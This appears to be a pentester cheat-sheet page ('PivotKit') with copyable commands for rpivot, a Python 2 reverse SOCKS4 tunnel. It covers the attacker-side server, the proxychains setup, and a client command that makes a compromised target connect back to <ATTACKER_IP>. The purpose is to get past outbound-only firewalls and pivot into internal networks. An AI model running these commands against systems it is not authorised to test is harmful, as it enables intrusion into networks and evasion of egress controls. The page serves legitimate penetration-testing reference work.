PivotKit
Attacker / Pentester Perspective
Live
Python 2 reverse SOCKS4 tunnel — useful when only outbound HTTP is allowed from the target. Learn about this tool.
Server (Attacker)
Client (Target)
WinLinux
On Attacker (Server)
1
python2 rpivot.zip server --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 --proxy-port 1080Copy2
# Add to /etc/proxychains.conf:
# socks4 127.0.0.1 1080Copy3
# Example: proxychains curl http://<INTERNAL_HOST>CopyOn Target (Client)
4
python2 rpivot.zip client --server-ip <ATTACKER_IP> --server-port 9999Copy